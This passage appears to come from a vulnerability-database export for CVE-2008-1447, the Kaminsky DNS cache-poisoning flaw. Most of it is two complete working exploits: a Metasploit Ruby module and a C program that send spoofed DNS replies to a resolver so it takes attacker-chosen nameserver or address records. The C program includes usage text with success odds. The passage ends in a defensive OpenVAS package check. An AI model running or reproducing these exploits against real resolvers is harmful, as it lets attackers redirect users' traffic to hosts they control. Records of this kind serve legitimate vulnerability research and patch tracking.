~Jul 2008. This exploit replaces the target\n\t\t\t\tdomains nameserver entries in a vulnerable DNS cache server. This attack works\n\t\t\t\tby sending random hostname queries to the target DNS server coupled with spoofed\n\t\t\t\treplies to those queries from the authoritative nameservers for that domain.\n\t\t\t\tEventually, a guessed ID will match, the spoofed packet will get accepted, and\n\t\t\t\tthe nameserver entries for the target domain will be replaced by the server\n\t\t\t\tspecified in the NEWDNS option of this exploit.\n\t\t\t},\n\t\t\t'Author' => \n\t\t\t\t[ \n\t\t\t\t'\tI)ruid', 'hdm',\n\t\t\t\t\t #\n\t\t\t\t\t'Cedric Blancher <sid[at]rstack.org>' # Cedric figured out the NS injection method \n\t\t\t\t\t # and was cool enough to email us and share!\n\t\t\t\t\t #\n\t\t\t\t],\n\t\t\t'License' => MSF_LICENSE,\n\t\t\t'Version' => '$Revision: 5591 $',\n\t\t\t'References' =>\n\t\t\t\t[\n\t\t\t\t\t[ 'CVE', '2008-1447' ],\n\t\t\t\t\t[ 'US-CERT-VU', '8000113' ],\n\t\t\t\t\t[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ],\n\t\t\t\t],\n\t\t\t'DisclosureDate' => 'Jul 21 2008'\n\t\t\t))\n\t\t\t\n\t\t\tregister_options(\n\t\t\t\t[\n\t\t\t\t\tOptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]),\n\t\t\t\t\tOptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),\n\t\t\t\t\tOptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),\n\t\t\t\t\tOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']),\n\t\t\t\t\tOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]),\n\t\t\t\t\tOptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]),\n\t\t\t\t], self.class)\n\t\t\t\t\t\n\tend\n\t\n\tdef auxiliary_commands\n\t\treturn { \"check\" => \"Determine if the specified DNS server (RHOST) is vulnerable\" }\n\tend\n\n\tdef cmd_check(*args)\n\t\ttarg = args[0] || rhost()\n\t\tif(not (targ and targ.length > 0))\n\t\t\tprint_status(\"usage: check [dns-server]\")\n\t\t\treturn\n\t\tend\n\n\t\tprint_status(\"Using the Metasploit service to verify exploitability...\")\n\t\tsrv_sock = Rex::Socket.create_udp(\n\t\t\t'PeerHost' => targ,\n\t\t\t'PeerPort' => 53\n\t\t)\t\t\n\n\t\trandom = false\n\t\tports = []\n\t\tlport = nil\n\t\t\n\t\t1.upto(5) do |i|\n\t\t\n\t\t\treq = Resolv::DNS::Message.new\n\t\t\ttxt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\"\n\t\t\treq.add_question(txt, Resolv::DNS::Resource::IN::TXT)\n\t\t\treq.rd = 1\n\t\t\t\n\t\t\tsrv_sock.put(req.encode)\n\t\t\tres, addr = srv_sock.recvfrom()\n\t\t\t\n\n\t\t\tif res and res.length > 0\n\t\t\t\tres = Resolv::DNS::Message.decode(res)\n\t\t\t\tres.each_answer do |name, ttl, data|\n\t\t\t\t\tif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\n\t\t\t\t\t\tt_addr, t_port = $1.split(':')\n\n\t\t\t\t\t\tprint_status(\" >> ADDRESS: #{t_addr} PORT: #{t_port}\")\n\t\t\t\t\t\tt_port = t_port.to_i\n\t\t\t\t\t\tif(lport and lport != t_port)\n\t\t\t\t\t\t\trandom = true\n\t\t\t\t\t\tend\n\t\t\t\t\t\tlport = t_port\n\t\t\t\t\t\tports << t_port\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\t\n\t\tend\n\t\t\n\t\tsrv_sock.close\n\t\t\n\t\tif(ports.length < 5)\n\t\t\tprint_status(\"UNKNOWN: This server did not reply to our vulnerability check requests\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\tif(random)\n\t\t\tprint_status(\"PASS: This server does not use a static source port. Ports: #{ports.join(\", \")}\")\n\t\t\tprint_status(\" This server may still be exploitable, but not by this tool.\")\n\t\telse\n\t\t\tprint_status(\"FAIL: This server uses static source ports and is vulnerable to poisoning\")\n\t\tend\n\tend\n\t\t\n\tdef run\n\t\ttarget = rhost()\n\t\tsource = Rex::Socket.source_address(target)\n\t\tsport = datastore['SRCPORT']\n\t\tdomain = datastore['DOMAIN'] + '.'\n\t\tnewdns = datastore['NEWDNS']\n\t\trecons = datastore['RECONS']\n\t\txids = datastore['XIDS'].to_i\n\t\tnewttl = datastore['TTL'].to_i\n\t\txidbase = rand(20001) + 20000\n\t\t\n\t\taddress = Rex::Text.rand_text(4).unpack(\"C4\").join(\".\")\n\n\t\tsrv_sock = Rex::Socket.create_udp(\n\t\t\t'PeerHost' => target,\n\t\t\t'PeerPort' => 53\n\t\t)\n\n\t\t# Get the source port via the metasploit service if it's not set\n\t\tif sport.to_i == 0\n\t\t\treq = Resolv::DNS::Message.new\n\t\t\ttxt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\"\n\t\t\treq.add_question(txt, Resolv::DNS::Resource::IN::TXT)\n\t\t\treq.rd = 1\n\t\t\t\n\t\t\tsrv_sock.put(req.encode)\n\t\t\tres, addr = srv_sock.recvfrom()\n\t\t\t\n\t\t\tif res and res.length > 0\n\t\t\t\tres = Resolv::DNS::Message.decode(res)\n\t\t\t\tres.each_answer do |name, ttl, data|\n\t\t\t\t\tif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\n\t\t\t\t\t\tt_addr, t_port = $1.split(':')\n\t\t\t\t\t\tsport = t_port.to_i\n\n\t\t\t\t\t\tprint_status(\"Switching to target port #{sport} based on Metasploit service\")\n\t\t\t\t\t\tif target != t_addr\n\t\t\t\t\t\t\tprint_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\")\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\t# Verify its not already poisoned\n\t\tbegin\n\t\t\tquery = Resolv::DNS::Message.new\n\t\t\tquery.add_question(domain, Resolv::DNS::Resource::IN::NS)\n\t\t\tquery.rd = 0\n\n\t\t\tbegin\n\t\t\t\tcached = false\n\t\t\t\tsrv_sock.put(query.encode)\n\t\t\t\tanswer, addr = srv_sock.recvfrom()\n\n\t\t\t\tif answer and answer.length > 0\n\t\t\t\t\tanswer = Resolv::DNS::Message.decode(answer)\n\t\t\t\t\tanswer.each_answer do |name, ttl, data|\n\n\t\t\t\t\t\tif((name.to_s + \".\") == domain and data.name.to_s == newdns)\n\t\t\t\t\t\t\tt = Time.now + ttl\n\t\t\t\t\t\t\tprint_status(\"Failure: This domain is already using #{newdns} as a nameserver\")\n\t\t\t\t\t\t\tprint_status(\" Cache entry expires on #{t.to_s}\")\n\t\t\t\t\t\t\tsrv_sock.close\n\t\t\t\t\t\t\tdisconnect_ip\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\t\t\n\t\t\t\tend\n\t\t\tend until not cached\n\t\trescue ::Interrupt\n\t\t\traise $!\n\t\trescue ::Exception => e\n\t\t\tprint_status(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\")\n\t\tend\n\n\n\t\tres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver\n\n\t\tprint_status \"Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}\"\n\n\t\t# Look up the nameservers for the domain\n\t\tprint_status \"Querying recon nameserver for #{domain}'s nameservers...\"\n\t\tanswer0 = res0.send(domain, Net::DNS::NS)\n\t\t#print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\"\n\n\t\tbarbs = [] # storage for nameservers\n\t\tanswer0.answer.each do |rr0|\n\t\t\tprint_status \" Got an #{rr0.type} record: #{rr0.inspect}\"\n\t\t\tif rr0.type == 'NS'\n\t\t\t\tprint_status \" Querying recon nameserver for address of #{rr0.nsdname}...\"\n\t\t\t\tanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname\n\t\t\t\t#print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\"\n\t\t\t\tanswer1.answer.each do |rr1|\n\t\t\t\t\tprint_status \" Got an #{rr1.type} record: #{rr1.inspect}\"\n\t\t\t\t\tres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \n\t\t\t\t\tprint_status \" Checking Authoritativeness: Querying #{rr1.address} for #{domain}...\"\n\t\t\t\t\tanswer2 = res2.send(domain)\n\t\t\t\t\tif answer2 and answer2.header.auth? and answer2.header.anCount >= 1\n\t\t\t\t\t\tnsrec = {:name => rr0.nsdname, :addr => rr1.address}\n\t\t\t\t\t\tbarbs << nsrec\n\t\t\t\t\t\tprint_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\"\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\t\n\t\tend\n\n\t\tif barbs.length == 0\n\t\t\tprint_status( \"No DNS servers found.\")\n\t\t\tsrv_sock.close\n\t\t\tdisconnect_ip\n\t\t\treturn\n\t\tend\n\n\t\t# Flood the target with queries and spoofed responses, one will eventually hit\n\t\tqueries = 0\n\t\tresponses = 0\n\n\t\tconnect_ip if not ip_sock\n\n\t\tprint_status( \"Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...\")\n\n\t\twhile true\n\t\t\trandhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname\n\n\t\t\t# Send spoofed query\n\t\t\treq = Resolv::DNS::Message.new\n\t\t\treq.id = rand(2**16)\n\t\t\treq.add_question(randhost, Resolv::DNS::Resource::IN::A)\n\n\t\t\treq.rd = 1\n\n\t\t\tbuff = (\n\t\t\t\tScruby::IP.new(\n\t\t\t\t\t#:src => barbs[0][:addr].to_s,\n\t\t\t\t\t:src => source,\n\t\t\t\t\t:dst => target,\n\t\t\t\t\t:proto => 17\n\t\t\t\t)/Scruby::UDP.new(\n\t\t\t\t\t:sport => (rand((2**16)-1024)+1024).to_i,\n\t\t\t\t\t:dport => 53\n\t\t\t\t)/req.encode\n\t\t\t).to_net\n\t\t\tip_sock.sendto(buff, target)\n\t\t\tqueries += 1\n\t\t\t\n\t\t\t# Send evil spoofed answer from ALL nameservers (barbs[*][:addr])\n\t\t\treq.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address))\n\t\t\treq.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns)))\n\t\t\treq.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored\n\t\t\treq.qr = 1\n\t\t\treq.aa = 1\n\n\t\t\txidbase.upto(xidbase+xids-1) do |id|\n\t\t\t\treq.id = id\n\t\t\t\tbarbs.each do |barb|\n\t\t\t\t\tbuff = (\n\t\t\t\t\t\tScruby::IP.new(\n\t\t\t\t\t\t\t#:src => barbs[i][:addr].to_s,\n\t\t\t\t\t\t\t:src => barb[:addr].to_s,\n\t\t\t\t\t\t\t:dst => target,\n\t\t\t\t\t\t\t:proto => 17\n\t\t\t\t\t\t)/Scruby::UDP.new(\n\t\t\t\t\t\t\t:sport => 53,\n\t\t\t\t\t\t\t:dport => sport.to_i\n\t\t\t\t\t\t)/req.encode\n\t\t\t\t\t).to_net\n\t\t\t\t\tip_sock.sendto(buff, target)\n\t\t\t\t\tresponses += 1\n\t\t\t\tend\n\t\t\tend\n\n\t\t\t# status update\n\t\t\tif queries % 1000 == 0\n\t\t\t\tprint_status(\"Sent #{queries} queries and #{responses} spoofed responses...\")\n\t\t\tend\n\n\t\t\t# every so often, check and see if the target is poisoned...\n\t\t\tif queries % 250 == 0 \n\t\t\t\tbegin\n\t\t\t\t\tquery = Resolv::DNS::Message.new\n\t\t\t\t\tquery.add_question(domain, Resolv::DNS::Resource::IN::NS)\n\t\t\t\t\tquery.rd = 0\n\t\n\t\t\t\t\tsrv_sock.put(query.encode)\n\t\t\t\t\tanswer, addr = srv_sock.recvfrom()\n\n\t\t\t\t\tif answer and answer.length > 0\n\t\t\t\t\t\tanswer = Resolv::DNS::Message.decode(answer)\n\t\t\t\t\t\tanswer.each_answer do |name, ttl, data|\n\t\t\t\t\t\t\tif((name.to_s + \".\") == domain and data.name.to_s == newdns)\n\t\t\t\t\t\t\t\tprint_status(\"Poisoning successful after #{queries} attempts: #{domain} == #{newdns}\")\n\t\t\t\t\t\t\t\tsrv_sock.close\n\t\t\t\t\t\t\t\tdisconnect_ip\n\t\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\trescue ::Interrupt\n\t\t\t\t\traise $!\n\t\t\t\trescue ::Exception => e\n\t\t\t\t\tprint_status(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\")\n\t\t\t\tend\n\t\t\tend\n\n\t\tend\n\n\tend\n\nend\nend\t\n\n# milw0rm.com [2008-07-23]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-04-01T19:04:05", "description": "\nBIND 9.x - Remote DNS Cache Poisoning", "edition": 1, "published": "2008-07-25T00:00:00", "title": "BIND 9.x - Remote DNS Cache Poisoning", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-25T00:00:00", "id": "EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D", "href": "", "sourceData": "/*\n * Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack\n *\n * Compilation:\n * $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm\n *\n * Dependency: libdnet (aka libdumbnet-dev under Ubuntu)\n *\n * Author: marc.bevand at rapid7 dot com\n */\n\n#define _BSD_SOURCE\n\n#include <sys/types.h>\n#include <err.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <math.h>\n#include <time.h>\n#include <unistd.h>\n#include <dumbnet.h>\n\n#define DNSF_RESPONSE (1<<15)\n#define DNSF_AUTHORITATIVE (1<<10)\n#define DNSF_REC_DESIRED (1<<8)\n#define DNSF_REC_AVAILABLE (1<<7)\n\n#define TYPE_A 0x1\n#define TYPE_NS 0x2\n#define CLASS_IN 0x1\n\nstruct dns_pkt\n{\n uint16_t txid;\n uint16_t flags;\n uint16_t nr_quest;\n uint16_t nr_ans;\n uint16_t nr_auth;\n uint16_t nr_add;\n} __attribute__ ((__packed__));\n\nvoid format_domain(u_char *buf, unsigned size, unsigned *len, const char *name)\n{\n unsigned bufi, i, j;\n bufi = i = j = 0;\n while (name[i])\n {\n if (name[i] == '.')\n {\n if (bufi + 1 + (i - j) > size)\n fprintf(stderr, \"format_domain overflow\\n\"), exit(1);\n buf[bufi++] = i - j;\n memcpy(buf + bufi, name + j, i - j);\n bufi += i - j;\n j = i + 1;\n }\n i++;\n }\n if (bufi + 1 + 2 + 2 > size)\n fprintf(stderr, \"format_domain overflow\\n\"), exit(1);\n buf[bufi++] = 0;\n *len = bufi;\n}\n\nvoid format_qr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class)\n{\n uint16_t tmp;\n // name\n format_domain(buf, size, len, name);\n // type\n tmp = htons(type);\n memcpy(buf + *len, &tmp, sizeof (tmp));\n *len += sizeof (tmp);\n // class\n tmp = htons(class);\n memcpy(buf + *len, &tmp, sizeof (tmp));\n *len += sizeof (tmp);\n}\n\nvoid format_rr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class, uint32_t ttl, const char *data)\n{\n format_qr(buf, size, len, name, type, class);\n // ttl\n ttl = htonl(ttl);\n memcpy(buf + *len, &ttl, sizeof (ttl));\n *len += sizeof (ttl);\n // data length + data\n uint16_t dlen;\n struct addr addr;\n switch (type)\n {\n case TYPE_A:\n dlen = sizeof (addr.addr_ip);\n break;\n case TYPE_NS:\n dlen = strlen(data) + 1;\n break;\n default:\n fprintf(stderr, \"format_rr: unknown type %02x\", type);\n exit(1);\n }\n dlen = htons(dlen);\n memcpy(buf + *len, &dlen, sizeof (dlen));\n *len += sizeof (dlen);\n // data\n unsigned len2;\n switch (type)\n {\n case TYPE_A:\n if (addr_aton(data, &addr) < 0)\n fprintf(stderr, \"invalid destination IP: %s\", data), exit(1);\n memcpy(buf + *len, &addr.addr_ip, sizeof (addr.addr_ip));\n *len += sizeof (addr.addr_ip);\n break;\n case TYPE_NS:\n format_domain(buf + *len, size - *len, &len2, data);\n *len += len2;\n break;\n default:\n fprintf(stderr, \"format_rr: unknown type %02x\", type);\n exit(1);\n }\n}\n\nvoid dns_query(u_char *buf, unsigned size, unsigned *len, uint16_t txid, uint16_t flags, const char *name)\n{\n u_char *out = buf;\n struct dns_pkt p = {\n .txid = htons(txid),\n .flags = htons(flags),\n .nr_quest = htons(1),\n .nr_ans = htons(0),\n .nr_auth = htons(0),\n .nr_add = htons(0),\n };\n u_char qr[256];\n unsigned l;\n format_qr(qr, sizeof (qr), &l, name, TYPE_A, CLASS_IN);\n if (sizeof (p) + l > size)\n fprintf(stderr, \"dns_query overflow\"), exit(1);\n memcpy(out, &p, sizeof (p));\n out += sizeof (p);\n memcpy(out, qr, l);\n out += l;\n *len = sizeof (p) + l;\n}\n\nvoid dns_response(u_char *buf, unsigned size, unsigned *len,\n uint16_t txid, uint16_t flags,\n const char *q_name, const char *q_ip,\n const char *domain, const char *auth_name, const char *auth_ip)\n{\n u_char *out = buf;\n u_char *end = buf + size;\n u_char rec[256];\n unsigned l_rec;\n uint32_t ttl = 24*3600;\n struct dns_pkt p = {\n .txid = htons(txid),\n .flags = htons(flags),\n .nr_quest = htons(1),\n .nr_ans = htons(1),\n .nr_auth = htons(1),\n .nr_add = htons(1),\n };\n (void)domain;\n *len = 0;\n if (out + *len + sizeof (p) > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, &p, sizeof (p)); *len += sizeof (p);\n // queries\n format_qr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n // answers\n format_rr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN,\n ttl, q_ip);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n // authoritative nameservers\n format_rr(rec, sizeof (rec), &l_rec, domain, TYPE_NS, CLASS_IN,\n ttl, auth_name);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n // additional records\n format_rr(rec, sizeof (rec), &l_rec, auth_name, TYPE_A, CLASS_IN,\n ttl, auth_ip);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n}\n\nunsigned build_query(u_char *buf, const char *srcip, const char *dstip, const char *name)\n{\n unsigned len = 0;\n // ip\n struct ip_hdr *ip = (struct ip_hdr *)buf;\n ip->ip_hl = 5;\n ip->ip_v = 4;\n ip->ip_tos = 0;\n ip->ip_id = rand() & 0xffff;\n ip->ip_off = 0;\n ip->ip_ttl = IP_TTL_MAX;\n ip->ip_p = 17; // udp\n ip->ip_sum = 0;\n struct addr addr;\n if (addr_aton(srcip, &addr) < 0)\n fprintf(stderr, \"invalid source IP: %s\", srcip), exit(1);\n ip->ip_src = addr.addr_ip;\n if (addr_aton(dstip, &addr) < 0)\n fprintf(stderr, \"invalid destination IP: %s\", dstip), exit(1);\n ip->ip_dst = addr.addr_ip;\n // udp\n struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN);\n udp->uh_sport = htons(1234);\n udp->uh_dport = htons(53);\n // dns\n dns_query(buf + IP_HDR_LEN + UDP_HDR_LEN,\n (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,\n rand(), DNSF_REC_DESIRED, name);\n // udp len\n len += UDP_HDR_LEN;\n udp->uh_ulen = htons(len);\n // ip len & cksum\n len += IP_HDR_LEN;\n ip->ip_len = htons(len);\n ip_checksum(buf, len);\n return len;\n}\n\nunsigned build_response(u_char *buf, const char *srcip, const char *dstip,\n uint16_t port_resolver, uint16_t txid,\n const char *q_name, const char *q_ip,\n const char *domain, const char *auth_name, const char *auth_ip)\n{\n unsigned len = 0;\n // ip\n struct ip_hdr *ip = (struct ip_hdr *)buf;\n ip->ip_hl = 5;\n ip->ip_v = 4;\n ip->ip_tos = 0;\n ip->ip_id = rand() & 0xffff;\n ip->ip_off = 0;\n ip->ip_ttl = IP_TTL_MAX;\n ip->ip_p = 17; // udp\n ip->ip_sum = 0;\n struct addr addr;\n if (addr_aton(srcip, &addr) < 0)\n fprintf(stderr, \"invalid source IP: %s\", srcip), exit(1);\n ip->ip_src = addr.addr_ip;\n if (addr_aton(dstip, &addr) < 0)\n fprintf(stderr, \"invalid destination IP: %s\", dstip), exit(1);\n ip->ip_dst = addr.addr_ip;\n // udp\n struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN);\n udp->uh_sport = htons(53);\n udp->uh_dport = htons(port_resolver);\n // dns\n dns_response(buf + IP_HDR_LEN + UDP_HDR_LEN,\n (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,\n txid, DNSF_RESPONSE | DNSF_AUTHORITATIVE,\n q_name, q_ip, domain, auth_name, auth_ip);\n // udp len\n len += UDP_HDR_LEN;\n udp->uh_ulen = htons(len);\n // ip len & cksum\n len += IP_HDR_LEN;\n ip->ip_len = htons(len);\n ip_checksum(buf, len);\n return len;\n}\n\nvoid usage(char *name)\n{\n fprintf(stderr, \"Usage: %s <ip-querier> <ip-resolver> <ip-authoritative> \"\n \"<port-resolver> <subhost> <domain> <any-ip> <attempts> <repl-per-attempt>\\n\"\n \" <ip-querier> Source IP used when sending queries for random hostnames\\n\"\n \" (typically your IP)\\n\"\n \" <ip-resolver> Target DNS resolver to attack\\n\"\n \" <ip-authoritative> One of the authoritative DNS servers for <domain>\\n\"\n \" <port-resolver> Source port used by the resolver when forwarding queries\\n\"\n \" <subhost> Poison the cache with the A record <subhost>.<domain>\\n\"\n \" <domain> Domain name, see <subhost>.\\n\"\n \" <any-ip> IP of your choice to be associated to <subhost>.<domain>\\n\"\n \" <attempts> Number of poisoning attemps, more attempts increase the\\n\"\n \" chance of successful poisoning, but also the attack time\\n\"\n \" <repl-per-attempt> Number of spoofed replies to send per attempt, more replies\\n\"\n \" increase the chance of successful poisoning but, but also\\n\"\n \" the rate of packet loss\\n\"\n \"Example:\\n\"\n \" $ %s q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 1.1.1.1 8192 16\\n\"\n \"This should cause a pwned.example.com A record resolving to 1.1.1.1 to appear\\n\"\n \"in r.r.r.r's cache. The chance of successfully poisoning the resolver with\\n\"\n \"this example (8192 attempts and 16 replies/attempt) is 86%%\\n\"\n \"(1-(1-16/65536)**8192). This example also requires a bandwidth of about\\n\"\n \"2.6 Mbit/s (16 replies/attempt * ~200 bytes/reply * 100 attempts/sec *\\n\"\n \"8 bits/byte) and takes about 80 secs to complete (8192 attempts /\\n\"\n \"100 attempts/sec).\\n\",\n name, name);\n}\n\nint main(int argc, char **argv)\n{\n if (argc != 10)\n usage(argv[0]), exit(1);\n const char *querier = argv[1];\n const char *ip_resolver = argv[2];\n const char *ip_authoritative = argv[3];\n uint16_t port_resolver = (uint16_t)strtoul(argv[4], NULL, 0);\n const char *subhost = argv[5];\n const char *domain = argv[6];\n const char *anyip = argv[7];\n uint16_t attempts = (uint16_t)strtoul(argv[8], NULL, 0);\n uint16_t replies = (uint16_t)strtoul(argv[9], NULL, 0);\n if (domain[strlen(domain) - 1 ] != '.')\n fprintf(stderr, \"domain must end with dot(.): %s\\n\", domain), exit(1);\n printf(\"Chance of success: 1-(1-%d/65536)**%d = %.2f\\n\", replies, attempts, 1 - pow((1 - replies / 65536.), attempts));\n srand(time(NULL));\n int unique = rand() + (rand() << 16);\n u_char buf[IP_LEN_MAX];\n unsigned len;\n char name[256];\n char ns[256];\n ip_t *iph;\n if ((iph = ip_open()) == NULL)\n err(1, \"ip_open\");\n int cnt = 0;\n while (cnt < attempts)\n {\n // send a query for a random hostname\n snprintf(name, sizeof (name), \"%08x%08x.%s\", unique, cnt, domain);\n len = build_query(buf, querier, ip_resolver, name);\n if (ip_send(iph, buf, len) != len)\n err(1, \"ip_send\");\n // give the resolver enough time to forward the query and be in a state\n // where it waits for answers; sleeping 10ms here limits the number of\n // attempts to 100 per sec\n usleep(10000);\n // send spoofed replies, each reply contains:\n // - 1 query: query for the \"random hostname\"\n // - 1 answer: \"random hostname\" A 1.1.1.1\n // - 1 authoritative nameserver: <domain> NS <subhost>.<domain>\n // - 1 additional record: <subhost>.<domain> A <any-ip>\n snprintf(ns, sizeof (ns), \"%s.%s\", subhost, domain);\n unsigned r;\n for (r = 0; r < replies; r++)\n {\n // use a txid that is just 'r': 0..(replies-1)\n len = build_response(buf, ip_authoritative, ip_resolver,\n port_resolver, r, name, \"1.1.1.1\", domain, ns, anyip);\n if (ip_send(iph, buf, len) != len)\n err(1, \"ip_send\");\n }\n cnt++;\n }\n ip_close(iph);\n return 0;\n}\n\n// milw0rm.com [2008-07-25]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2017-07-24T12:51:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2008-191-02.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:61464", "href": "http://plugins.openvas.org/nasl.php?oid=61464", "type": "openvas", "title": "Slackware Advisory SSA:2008-191-02 bind", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2008_191_02.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New bind packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\n11.0, 12.0, 12.1, and -current to address a security problem.\n\nMore details may be found at the following links:\n\nhttp://www.isc.org/sw/bind/bind-security.php\nhttp://www.kb.cert.org/vuls/id/800113\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2008-191-02.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2008-191-02\";\n \nif(description)\n{\n script_id(61464);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2008-1447\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2008-191-02 bind \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i386-1_slack8.1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i386-1_slack9.0\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln 